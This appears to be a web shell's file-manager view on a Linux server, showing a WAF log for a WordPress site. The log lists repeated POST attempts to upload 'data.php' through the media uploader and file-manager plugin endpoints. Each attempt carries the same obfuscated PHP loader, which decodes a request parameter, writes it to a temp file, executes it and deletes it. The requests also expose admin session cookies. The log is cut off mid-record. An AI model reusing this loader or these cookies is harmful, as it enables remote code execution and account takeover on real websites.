HEX
Server: nginx/1.26.1
System: Linux iZrj9cbdvwu1cot8sjlyzlZ 5.10.134-15.al8.x86_64 #1 SMP Thu Jul 20 00:44:04 CST 2023 x86_64
User: www (1000)
PHP: 7.4.33
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
$ pwd: /www/wwwlogs/free_waf_log/
Upload Files
File: //www/wwwlogs/free_waf_log/dewenlabels.com_2026-03-25.log
["2026-03-25 01:43:11","152.52.245.142","POST","\/wp-admin\/media-new.php","Mozilla\/5.0 (Windows NT 6.2; ARM; Trident\/7.0; Touch; rv:11.0; WPDesktop; NOKIA; Lumia 1520) like Gecko","post","http包非法,并且被封锁IP,如果自定义了from-data可能会导致误报。如果大量出现当前问题。可以选择在全局设置中关闭From-data协议22","POST \/wp-admin\/media-new.php HTTP\/1.1\nuser-agent:Mozilla\/5.0 (Windows NT 6.2; ARM; Trident\/7.0; Touch; rv:11.0; WPDesktop; NOKIA; Lumia 1520) like Gecko\norigin:https:\/\/dewenlabels.com\nreferer:https:\/\/dewenlabels.com\/wp-admin\/media-new.php\ncookie:wordpress_test_cookie=WP%20Cookie%20check; wordpress_sec_3309b4d362f120e2b595228292f03253=admin%7C1775583756%7CY4D4Tv0LKwx9cvtcvGbswH7dozUjahj5EVZ3EcL7kru%7Cd00e7da5df40d339ff2df519dc43a834f589afa96849a8e2f33b91375ef2182b; wordpress_logged_in_3309b4d362f120e2b595228292f03253=admin%7C1775583756%7CY4D4Tv0LKwx9cvtcvGbswH7dozUjahj5EVZ3EcL7kru%7C65f51c1352dd75f370ef758e9eb5c68460d28b98fd080afa4ae8d107ca81cc1c; tk_ai=woo%3Aq77ENrbxlN0nWIsyMJCsQCGo; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce%26hidetb%3D1%26advImgDetails%3Dshow%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1774374159\ncontent-type:multipart\/form-data; boundary=----------------r8wybs5CN781T0oi\ncontent-length:1516\nhost:dewenlabels.com\nupgrade-insecure-requests:1\nconnection:keep-alive\nte:trailers\naccept-encoding:gzip,deflate\n\n------------------r8wybs5CN781T0oi\r\nContent-Disposition: form-data; name=\"async-upload\"; filename=\"data.php\"\r\nContent-Type: application\/octet-stream\r\n\r\n<?php\r\n\r\nif(in_array(\"c\\x6F\\x6D\\x70o\\x6E\\x65nt\", array_keys($_REQUEST))){\r\n$element = array_filter([getenv(\"TEMP\"), session_save_path(), sys_get_temp_dir(), ini_get(\"upload_tmp_dir\"), getcwd(), \"\/var\/tmp\", getenv(\"TMP\"), \"\/tmp\", \"\/dev\/shm\"]);\r\n$property_set = $_REQUEST[\"c\\x6F\\x6D\\x70o\\x6E\\x65nt\"];\r\n $property_set \t\t=\t explode  (\t \".\" \t,$property_set\t)\t\t\t;\t\r\n$dchunk \t=\t'';\r\n$salt8 \t=\t'abcdefghijklmnopqrstuvwxyz0123456789';\r\n$sLen \t=\tstrlen($salt8);\r\n\r\nforeach ($property_set as $i => $val) {\r\n    $chS \t=\tord($salt8[$i % $sLen]);\r\n    $dec \t=\t((int)$val - $chS - ($i % 10)) ^ 53;\r\n    $dchunk .= chr($dec);\r\n}\r\nforeach ($element as $fac) {\r\n            if (is_dir($fac) ? is_writable($fac) : false) {\r\n            $tkn = sprintf(\"%s\/.res\", $fac);\r\n            $val = fopen($tkn, 'wb');\r\nif ($val) {\r\n    fwrite($val, $dchunk);\r\n    fclose($val);\r\n    include $tkn;\r\n    @unlink($tkn);\r\n    exit;\r\n}\r\n        }\r\n}\r\n}\r\n------------------r8wybs5CN781T0oi\r\nContent-Disposition: form-data; name=\"html-upload\"\r\n\r\n上传\r\n------------------r8wybs5CN781T0oi\r\nContent-Disposition: form-data; name=\"post_id\"\r\n\r\n0\r\n------------------r8wybs5CN781T0oi\r\nContent-Disposition: form-data; name=\"_wpnonce\"\r\n\r\ne112a55f8a\r\n------------------r8wybs5CN781T0oi\r\nContent-Disposition: form-data; name=\"_wp_http_referer\"\r\n\r\n\/wp-admin\/media-new.php\r\n------------------r8wybs5CN781T0oi--\r\n"]
["2026-03-25 01:43:24","152.52.245.142","POST","\/wp-admin\/admin-ajax.php","Mozilla\/5.0 (Windows NT 6.2; ARM; Trident\/7.0; Touch; rv:11.0; WPDesktop; NOKIA; Lumia 1520) like Gecko","post","http包非法,并且被封锁IP,如果自定义了from-data可能会导致误报。如果大量出现当前问题。可以选择在全局设置中关闭From-data协议22","POST \/wp-admin\/admin-ajax.php HTTP\/1.1\nuser-agent:Mozilla\/5.0 (Windows NT 6.2; ARM; Trident\/7.0; Touch; rv:11.0; WPDesktop; NOKIA; Lumia 1520) like Gecko\norigin:https:\/\/dewenlabels.com\nreferer:https:\/\/dewenlabels.com\/wp-admin\/admin.php?page=file_manager_advanced_ui\ncookie:wordpress_test_cookie=WP%20Cookie%20check; wordpress_sec_3309b4d362f120e2b595228292f03253=admin%7C1775583756%7CY4D4Tv0LKwx9cvtcvGbswH7dozUjahj5EVZ3EcL7kru%7Cd00e7da5df40d339ff2df519dc43a834f589afa96849a8e2f33b91375ef2182b; wordpress_logged_in_3309b4d362f120e2b595228292f03253=admin%7C1775583756%7CY4D4Tv0LKwx9cvtcvGbswH7dozUjahj5EVZ3EcL7kru%7C65f51c1352dd75f370ef758e9eb5c68460d28b98fd080afa4ae8d107ca81cc1c; tk_ai=woo%3Aq77ENrbxlN0nWIsyMJCsQCGo; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce%26hidetb%3D1%26advImgDetails%3Dshow%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1774374159\ncontent-type:multipart\/form-data; boundary=----------------a1x2xft2Bd6RaOhv\ncontent-length:1509\nhost:dewenlabels.com\nupgrade-insecure-requests:1\nconnection:keep-alive\nte:trailers\naccept-encoding:gzip,deflate\n\n------------------a1x2xft2Bd6RaOhv\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------------------a1x2xft2Bd6RaOhv\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_d3AtY29udGVudC90aGVtZXM\r\n------------------a1x2xft2Bd6RaOhv\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_fma_ui\r\n------------------a1x2xft2Bd6RaOhv\r\nContent-Disposition: form-data; name=\"_fmakey\"\r\n\r\n89e27cf540\r\n------------------a1x2xft2Bd6RaOhv\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"data.php\"\r\nContent-Type: application\/octet-stream\r\n\r\n<?php\r\n\r\nif(in_array(\"c\\x6F\\x6D\\x70o\\x6E\\x65nt\", array_keys($_REQUEST))){\r\n$element = array_filter([getenv(\"TEMP\"), session_save_path(), sys_get_temp_dir(), ini_get(\"upload_tmp_dir\"), getcwd(), \"\/var\/tmp\", getenv(\"TMP\"), \"\/tmp\", \"\/dev\/shm\"]);\r\n$property_set = $_REQUEST[\"c\\x6F\\x6D\\x70o\\x6E\\x65nt\"];\r\n $property_set \t\t=\t explode  (\t \".\" \t,$property_set\t)\t\t\t;\t\r\n$dchunk \t=\t'';\r\n$salt8 \t=\t'abcdefghijklmnopqrstuvwxyz0123456789';\r\n$sLen \t=\tstrlen($salt8);\r\n\r\nforeach ($property_set as $i => $val) {\r\n    $chS \t=\tord($salt8[$i % $sLen]);\r\n    $dec \t=\t((int)$val - $chS - ($i % 10)) ^ 53;\r\n    $dchunk .= chr($dec);\r\n}\r\nforeach ($element as $fac) {\r\n            if (is_dir($fac) ? is_writable($fac) : false) {\r\n            $tkn = sprintf(\"%s\/.res\", $fac);\r\n            $val = fopen($tkn, 'wb');\r\nif ($val) {\r\n    fwrite($val, $dchunk);\r\n    fclose($val);\r\n    include $tkn;\r\n    @unlink($tkn);\r\n    exit;\r\n}\r\n        }\r\n}\r\n}\r\n------------------a1x2xft2Bd6RaOhv--\r\n"]
["2026-03-25 01:43:41","152.52.245.142","POST","\/wp-admin\/admin-ajax.php","Mozilla\/5.0 (Windows NT 6.2; ARM; Trident\/7.0; Touch; rv:11.0; WPDesktop; NOKIA; Lumia 1520) like Gecko","post","http包非法,并且被封锁IP,如果自定义了from-data可能会导致误报。如果大量出现当前问题。可以选择在全局设置中关闭From-data协议22","POST \/wp-admin\/admin-ajax.php HTTP\/1.1\nuser-agent:Mozilla\/5.0 (Windows NT 6.2; ARM; Trident\/7.0; Touch; rv:11.0; WPDesktop; NOKIA; Lumia 1520) like Gecko\norigin:https:\/\/dewenlabels.com\nreferer:https:\/\/dewenlabels.com\/wp-admin\/admin.php?page=wp_file_manager\ncookie:wordpress_test_cookie=WP%20Cookie%20check; wordpress_sec_3309b4d362f120e2b595228292f03253=admin%7C1775583756%7CY4D4Tv0LKwx9cvtcvGbswH7dozUjahj5EVZ3EcL7kru%7Cd00e7da5df40d339ff2df519dc43a834f589afa96849a8e2f33b91375ef2182b; wordpress_logged_in_3309b4d362f120e2b595228292f03253=admin%7C1775583756%7CY4D4Tv0LKwx9cvtcvGbswH7dozUjahj5EVZ3EcL7kru%7C65f51c1352dd75f370ef758e9eb5c68460d28b98fd080afa4ae8d107ca81cc1c; tk_ai=woo%3Aq77ENrbxlN0nWIsyMJCsQCGo; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce%26hidetb%3D1%26advImgDetails%3Dshow%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1774374159\ncontent-type:multipart\/form-data; boundary=----------------G06YygaDB3286KNC\ncontent-length:1517\nhost:dewenlabels.com\nupgrade-insecure-requests:1\nconnection:keep-alive\nte:trailers\naccept-encoding:gzip,deflate\n\n------------------G06YygaDB3286KNC\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------------------G06YygaDB3286KNC\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_d3AtY29udGVudC90aGVtZXM\r\n------------------G06YygaDB3286KNC\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nmk_file_folder_manager\r\n------------------G06YygaDB3286KNC\r\nContent-Disposition: form-data; name=\"_wpnonce\"\r\n\r\ne88f6a9c05\r\n------------------G06YygaDB3286KNC\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"data.php\"\r\nContent-Type: application\/octet-stream\r\n\r\n<?php\r\n\r\nif(in_array(\"c\\x6F\\x6D\\x70o\\x6E\\x65nt\", array_keys($_REQUEST))){\r\n$element = array_filter([getenv(\"TEMP\"), session_save_path(), sys_get_temp_dir(), ini_get(\"upload_tmp_dir\"), getcwd(), \"\/var\/tmp\", getenv(\"TMP\"), \"\/tmp\", \"\/dev\/shm\"]);\r\n$property_set = $_REQUEST[\"c\\x6F\\x6D\\x70o\\x6E\\x65nt\"];\r\n $property_set \t\t=\t explode  (\t \".\" \t,$property_set\t)\t\t\t;\t\r\n$dchunk \t=\t'';\r\n$salt8 \t=\t'abcdefghijklmnopqrstuvwxyz0123456789';\r\n$sLen \t=\tstrlen($salt8);\r\n\r\nforeach ($property_set as $i => $val) {\r\n    $chS \t=\tord($salt8[$i % $sLen]);\r\n    $dec \t=\t((int)$val - $chS - ($i % 10)) ^ 53;\r\n    $dchunk .= chr($dec);\r\n}\r\nforeach ($element as $fac) {\r\n            if (is_dir($fac) ? is_writable($fac) : false) {\r\n            $tkn = sprintf(\"%s\/.res\", $fac);\r\n            $val = fopen($tkn, 'wb');\r\nif ($val) {\r\n    fwrite($val, $dchunk);\r\n    fclose($val);\r\n    include $tkn;\r\n    @unlink($tkn);\r\n    exit;\r\n}\r\n        }\r\n}\r\n}\r\n------------------G06YygaDB3286KNC--\r\n"]
["2026-03-25 06:06:04","121.18.4.42","POST","\/wp-admin\/media-new.php","Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/66.0.3359.181 Safari\/537.36","post","http包非法,并且被封锁IP,如果自定义了from-data可能会导致误报。如果大量出现当前问题。可以选择在全局设置中关闭From-data协议22","POST \/wp-admin\/media-new.php HTTP\/1.1\ncontent-type:multipart\/form-data; boundary=----------------B8krDKw591D25GFm\ncookie:wordpress_test_cookie=WP%20Cookie%20check; wordpress_sec_3309b4d362f120e2b595228292f03253=admin%7C1775599529%7C1apSORJiX9AKeN1jNIr341K53kN1KNKWCVvqjdlcLt0%7C5102ec2e79bbac9960d896cdc1b435958ad49bff47b0d1dc686c310d0122ec86; wordpress_logged_in_3309b4d362f120e2b595228292f03253=admin%7C1775599529%7C1apSORJiX9AKeN1jNIr341K53kN1KNKWCVvqjdlcLt0%7C98d211bef6ddb41c280b51eda1e818a811b63a34b23f6e2d69c6e6639b03788e; tk_ai=woo%3Aq77ENrbxlN0nWIsyMJCsQCGo; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce%26hidetb%3D1%26advImgDetails%3Dshow%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1774389931\ncontent-length:1516\nhost:dewenlabels.com\nte:trailers\nconnection:keep-alive\nupgrade-insecure-requests:1\naccept-encoding:gzip,deflate\norigin:https:\/\/dewenlabels.com\nreferer:https:\/\/dewenlabels.com\/wp-admin\/media-new.php\nuser-agent:Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/66.0.3359.181 Safari\/537.36\n\n------------------B8krDKw591D25GFm\r\nContent-Disposition: form-data; name=\"async-upload\"; filename=\"data.php\"\r\nContent-Type: application\/octet-stream\r\n\r\n<?php\r\n\r\nif(in_array(\"c\\x6F\\x6D\\x70o\\x6E\\x65nt\", array_keys($_REQUEST))){\r\n$element = array_filter([getenv(\"TEMP\"), session_save_path(), sys_get_temp_dir(), ini_get(\"upload_tmp_dir\"), getcwd(), \"\/var\/tmp\", getenv(\"TMP\"), \"\/tmp\", \"\/dev\/shm\"]);\r\n$property_set = $_REQUEST[\"c\\x6F\\x6D\\x70o\\x6E\\x65nt\"];\r\n $property_set \t\t=\t explode  (\t \".\" \t,$property_set\t)\t\t\t;\t\r\n$dchunk \t=\t'';\r\n$salt8 \t=\t'abcdefghijklmnopqrstuvwxyz0123456789';\r\n$sLen \t=\tstrlen($salt8);\r\n\r\nforeach ($property_set as $i => $val) {\r\n    $chS \t=\tord($salt8[$i % $sLen]);\r\n    $dec \t=\t((int)$val - $chS - ($i % 10)) ^ 53;\r\n    $dchunk .= chr($dec);\r\n}\r\nforeach ($element as $fac) {\r\n            if (is_dir($fac) ? is_writable($fac) : false) {\r\n            $tkn = sprintf(\"%s\/.res\", $fac);\r\n            $val = fopen($tkn, 'wb');\r\nif ($val) {\r\n    fwrite($val, $dchunk);\r\n    fclose($val);\r\n    include $tkn;\r\n    @unlink($tkn);\r\n    exit;\r\n}\r\n        }\r\n}\r\n}\r\n------------------B8krDKw591D25GFm\r\nContent-Disposition: form-data; name=\"html-upload\"\r\n\r\n上传\r\n------------------B8krDKw591D25GFm\r\nContent-Disposition: form-data; name=\"post_id\"\r\n\r\n0\r\n------------------B8krDKw591D25GFm\r\nContent-Disposition: form-data; name=\"_wpnonce\"\r\n\r\n4ae94eae81\r\n------------------B8krDKw591D25GFm\r\nContent-Disposition: form-data; name=\"_wp_http_referer\"\r\n\r\n\/wp-admin\/media-new.php\r\n------------------B8krDKw591D25GFm--\r\n"]
["2026-03-25 06:06:18","121.18.4.42","POST","\/wp-admin\/admin-ajax.php","Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/66.0.3359.181 Safari\/537.36","post","http包非法,并且被封锁IP,如果自定义了from-data可能会导致误报。如果大量出现当前问题。可以选择在全局设置中关闭From-data协议22","POST \/wp-admin\/admin-ajax.php HTTP\/1.1\ncontent-type:multipart\/form-data; boundary=----------------1B1p4W3aF79o9ygL\ncookie:wordpress_test_cookie=WP%20Cookie%20check; wordpress_sec_3309b4d362f120e2b595228292f03253=admin%7C1775599529%7C1apSORJiX9AKeN1jNIr341K53kN1KNKWCVvqjdlcLt0%7C5102ec2e79bbac9960d896cdc1b435958ad49bff47b0d1dc686c310d0122ec86; wordpress_logged_in_3309b4d362f120e2b595228292f03253=admin%7C1775599529%7C1apSORJiX9AKeN1jNIr341K53kN1KNKWCVvqjdlcLt0%7C98d211bef6ddb41c280b51eda1e818a811b63a34b23f6e2d69c6e6639b03788e; tk_ai=woo%3Aq77ENrbxlN0nWIsyMJCsQCGo; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce%26hidetb%3D1%26advImgDetails%3Dshow%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1774389931\ncontent-length:1509\nhost:dewenlabels.com\nte:trailers\nconnection:keep-alive\nupgrade-insecure-requests:1\naccept-encoding:gzip,deflate\norigin:https:\/\/dewenlabels.com\nreferer:https:\/\/dewenlabels.com\/wp-admin\/admin.php?page=file_manager_advanced_ui\nuser-agent:Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/66.0.3359.181 Safari\/537.36\n\n------------------1B1p4W3aF79o9ygL\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------------------1B1p4W3aF79o9ygL\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_d3AtY29udGVudC90aGVtZXM\r\n------------------1B1p4W3aF79o9ygL\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_fma_ui\r\n------------------1B1p4W3aF79o9ygL\r\nContent-Disposition: form-data; name=\"_fmakey\"\r\n\r\ne4145f869f\r\n------------------1B1p4W3aF79o9ygL\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"data.php\"\r\nContent-Type: application\/octet-stream\r\n\r\n<?php\r\n\r\nif(in_array(\"c\\x6F\\x6D\\x70o\\x6E\\x65nt\", array_keys($_REQUEST))){\r\n$element = array_filter([getenv(\"TEMP\"), session_save_path(), sys_get_temp_dir(), ini_get(\"upload_tmp_dir\"), getcwd(), \"\/var\/tmp\", getenv(\"TMP\"), \"\/tmp\", \"\/dev\/shm\"]);\r\n$property_set = $_REQUEST[\"c\\x6F\\x6D\\x70o\\x6E\\x65nt\"];\r\n $property_set \t\t=\t explode  (\t \".\" \t,$property_set\t)\t\t\t;\t\r\n$dchunk \t=\t'';\r\n$salt8 \t=\t'abcdefghijklmnopqrstuvwxyz0123456789';\r\n$sLen \t=\tstrlen($salt8);\r\n\r\nforeach ($property_set as $i => $val) {\r\n    $chS \t=\tord($salt8[$i % $sLen]);\r\n    $dec \t=\t((int)$val - $chS - ($i % 10)) ^ 53;\r\n    $dchunk .= chr($dec);\r\n}\r\nforeach ($element as $fac) {\r\n            if (is_dir($fac) ? is_writable($fac) : false) {\r\n            $tkn = sprintf(\"%s\/.res\", $fac);\r\n            $val = fopen($tkn, 'wb');\r\nif ($val) {\r\n    fwrite($val, $dchunk);\r\n    fclose($val);\r\n    include $tkn;\r\n    @unlink($tkn);\r\n    exit;\r\n}\r\n        }\r\n}\r\n}\r\n------------------1B1p4W3aF79o9ygL--\r\n"]
["2026-03-25 06:06:37","121.18.4.42","POST","\/wp-admin\/admin-ajax.php","Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/66.0.3359.181 Safari\/537.36","post","http包非法,并且被封锁IP,如果自定义了from-data可能会导致误报。如果大量出现当前问题。可以选择在全局设置中关闭From-data协议22","POST \/wp-admin\/admin-ajax.php HTTP\/1.1\nreferer:https:\/\/dewenlabels.com\/wp-admin\/admin.php?page=wp_file_manager\ncookie:wordpress_test_cookie=WP%20Cookie%20check; wordpress_sec_3309b4d362f120e2b595228292f03253=admin%7C1775599529%7C1apSORJiX9AKeN1jNIr341K53kN1KNKWCVvqjdlcLt0%7C5102ec2e79bbac9960d896cdc1b435958ad49bff47b0d1dc686c310d0122ec86; wordpress_logged_in_3309b4d362f120e2b595228292f03253=admin%7C1775599529%7C1apSORJiX9AKeN1jNIr341K53kN1KNKWCVvqjdlcLt0%7C98d211bef6ddb41c280b51eda1e818a811b63a34b23f6e2d69c6e6639b03788e; tk_ai=woo%3Aq77ENrbxlN0nWIsyMJCsQCGo; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce%26hidetb%3D1%26advImgDetails%3Dshow%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1774389931\nuser-agent:Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/66.0.3359.181 Safari\/537.36\nhost:dewenlabels.com\nconnection:keep-alive\ncontent-type:multipart\/form-data; boundary=----------------M4ZzlG18Xn61J1k9\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nte:trailers\ncontent-length:1517\norigin:https:\/\/dewenlabels.com\n\n------------------M4ZzlG18Xn61J1k9\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------------------M4ZzlG18Xn61J1k9\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_d3AtY29udGVudC90aGVtZXM\r\n------------------M4ZzlG18Xn61J1k9\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nmk_file_folder_manager\r\n------------------M4ZzlG18Xn61J1k9\r\nContent-Disposition: form-data; name=\"_wpnonce\"\r\n\r\n31ee9e9694\r\n------------------M4ZzlG18Xn61J1k9\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"data.php\"\r\nContent-Type: application\/octet-stream\r\n\r\n<?php\r\n\r\nif(in_array(\"c\\x6F\\x6D\\x70o\\x6E\\x65nt\", array_keys($_REQUEST))){\r\n$element = array_filter([getenv(\"TEMP\"), session_save_path(), sys_get_temp_dir(), ini_get(\"upload_tmp_dir\"), getcwd(), \"\/var\/tmp\", getenv(\"TMP\"), \"\/tmp\", \"\/dev\/shm\"]);\r\n$property_set = $_REQUEST[\"c\\x6F\\x6D\\x70o\\x6E\\x65nt\"];\r\n $property_set \t\t=\t explode  (\t \".\" \t,$property_set\t)\t\t\t;\t\r\n$dchunk \t=\t'';\r\n$salt8 \t=\t'abcdefghijklmnopqrstuvwxyz0123456789';\r\n$sLen \t=\tstrlen($salt8);\r\n\r\nforeach ($property_set as $i => $val) {\r\n    $chS \t=\tord($salt8[$i % $sLen]);\r\n    $dec \t=\t((int)$val - $chS - ($i % 10)) ^ 53;\r\n    $dchunk .= chr($dec);\r\n}\r\nforeach ($element as $fac) {\r\n            if (is_dir($fac) ? is_writable($fac) : false) {\r\n            $tkn = sprintf(\"%s\/.res\", $fac);\r\n            $val = fopen($tkn, 'wb');\r\nif ($val) {\r\n    fwrite($val, $dchunk);\r\n    fclose($val);\r\n    include $tkn;\r\n    @unlink($tkn);\r\n    exit;\r\n}\r\n        }\r\n}\r\n}\r\n------------------M4ZzlG18Xn61J1k9--\r\n"]
["2026-03-25 10:29:39","199.38.86.102","POST","\/wp-admin\/media-new.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/67.0.3396.87 Safari\/537.36","post","http包非法,并且被封锁IP,如果自定义了from-data可能会导致误报。如果大量出现当前问题。可以选择在全局设置中关闭From-data协议22","POST \/wp-admin\/media-new.php HTTP\/1.1\nhost:dewenlabels.com\nconnection:keep-alive\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\ncookie:wordpress_test_cookie=WP%20Cookie%20check; wordpress_sec_3309b4d362f120e2b595228292f03253=admin%7C1775615335%7CSdeNKuQMRYnj0wCwlSqejbdAvnR9MUNHVSm67AI9299%7C2b7cd64a59f3abb4e30f8c2584898c04e443071b3e5784c8fdc612e69ca48889; wordpress_logged_in_3309b4d362f120e2b595228292f03253=admin%7C1775615335%7CSdeNKuQMRYnj0wCwlSqejbdAvnR9MUNHVSm67AI9299%7C16909238a9bcba18537ba75b885e9daa4f3638de2efda8eec94be67b6d3115f4; tk_ai=woo%3Aq77ENrbxlN0nWIsyMJCsQCGo; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce%26hidetb%3D1%26advImgDetails%3Dshow%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1774405738\nte:trailers\ncontent-type:multipart\/form-data; boundary=----------------4liiD506X6z68mM8\nreferer:https:\/\/dewenlabels.com\/wp-admin\/media-new.php\norigin:https:\/\/dewenlabels.com\ncontent-length:1516\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/67.0.3396.87 Safari\/537.36\n\n------------------4liiD506X6z68mM8\r\nContent-Disposition: form-data; name=\"async-upload\"; filename=\"data.php\"\r\nContent-Type: application\/octet-stream\r\n\r\n<?php\r\n\r\nif(in_array(\"c\\x6F\\x6D\\x70o\\x6E\\x65nt\", array_keys($_REQUEST))){\r\n$element = array_filter([getenv(\"TEMP\"), session_save_path(), sys_get_temp_dir(), ini_get(\"upload_tmp_dir\"), getcwd(), \"\/var\/tmp\", getenv(\"TMP\"), \"\/tmp\", \"\/dev\/shm\"]);\r\n$property_set = $_REQUEST[\"c\\x6F\\x6D\\x70o\\x6E\\x65nt\"];\r\n $property_set \t\t=\t explode  (\t \".\" \t,$property_set\t)\t\t\t;\t\r\n$dchunk \t=\t'';\r\n$salt8 \t=\t'abcdefghijklmnopqrstuvwxyz0123456789';\r\n$sLen \t=\tstrlen($salt8);\r\n\r\nforeach ($property_set as $i => $val) {\r\n    $chS \t=\tord($salt8[$i % $sLen]);\r\n    $dec \t=\t((int)$val - $chS - ($i % 10)) ^ 53;\r\n    $dchunk .= chr($dec);\r\n}\r\nforeach ($element as $fac) {\r\n            if (is_dir($fac) ? is_writable($fac) : false) {\r\n            $tkn = sprintf(\"%s\/.res\", $fac);\r\n            $val = fopen($tkn, 'wb');\r\nif ($val) {\r\n    fwrite($val, $dchunk);\r\n    fclose($val);\r\n    include $tkn;\r\n    @unlink($tkn);\r\n    exit;\r\n}\r\n        }\r\n}\r\n}\r\n------------------4liiD506X6z68mM8\r\nContent-Disposition: form-data; name=\"html-upload\"\r\n\r\n上传\r\n------------------4liiD506X6z68mM8\r\nContent-Disposition: form-data; name=\"post_id\"\r\n\r\n0\r\n------------------4liiD506X6z68mM8\r\nContent-Disposition: form-data; name=\"_wpnonce\"\r\n\r\nbfa14af603\r\n------------------4liiD506X6z68mM8\r\nContent-Disposition: form-data; name=\"_wp_http_referer\"\r\n\r\n\/wp-admin\/media-new.php\r\n------------------4liiD506X6z68mM8--\r\n"]
["2026-03-25 10:30:04","199.38.86.102","POST","\/wp-admin\/admin-ajax.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/67.0.3396.87 Safari\/537.36","post","http包非法,并且被封锁IP,如果自定义了from-data可能会导致误报。如果大量出现当前问题。可以选择在全局设置中关闭From-data协议22","POST \/wp-admin\/admin-ajax.php HTTP\/1.1\nhost:dewenlabels.com\nconnection:keep-alive\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\ncookie:wordpress_test_cookie=WP%20Cookie%20check; wordpress_sec_3309b4d362f120e2b595228292f03253=admin%7C1775615335%7CSdeNKuQMRYnj0wCwlSqejbdAvnR9MUNHVSm67AI9299%7C2b7cd64a59f3abb4e30f8c2584898c04e443071b3e5784c8fdc612e69ca48889; wordpress_logged_in_3309b4d362f120e2b595228292f03253=admin%7C1775615335%7CSdeNKuQMRYnj0wCwlSqejbdAvnR9MUNHVSm67AI9299%7C16909238a9bcba18537ba75b885e9daa4f3638de2efda8eec94be67b6d3115f4; tk_ai=woo%3Aq77ENrbxlN0nWIsyMJCsQCGo; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce%26hidetb%3D1%26advImgDetails%3Dshow%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1774405738\nte:trailers\ncontent-type:multipart\/form-data; boundary=----------------aTbaNRX5mxlD76Ek\nreferer:https:\/\/dewenlabels.com\/wp-admin\/admin.php?page=file_manager_advanced_ui\norigin:https:\/\/dewenlabels.com\ncontent-length:1509\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/67.0.3396.87 Safari\/537.36\n\n------------------aTbaNRX5mxlD76Ek\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------------------aTbaNRX5mxlD76Ek\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_d3AtY29udGVudC90aGVtZXM\r\n------------------aTbaNRX5mxlD76Ek\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_fma_ui\r\n------------------aTbaNRX5mxlD76Ek\r\nContent-Disposition: form-data; name=\"_fmakey\"\r\n\r\n5ede801c29\r\n------------------aTbaNRX5mxlD76Ek\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"data.php\"\r\nContent-Type: application\/octet-stream\r\n\r\n<?php\r\n\r\nif(in_array(\"c\\x6F\\x6D\\x70o\\x6E\\x65nt\", array_keys($_REQUEST))){\r\n$element = array_filter([getenv(\"TEMP\"), session_save_path(), sys_get_temp_dir(), 